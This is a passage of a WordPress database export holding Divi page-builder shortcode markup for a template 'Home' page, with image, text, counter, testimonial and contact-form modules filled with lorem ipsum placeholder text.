animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-06 20:45:15','2020-07-06 20:45:15','',134,'https://52.66.212.87/2020/07/06/134-revision-v1/',0,'revision','',0),(246,1,'2020-07-06 20:46:28','2020-07-06 20:46:28','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" 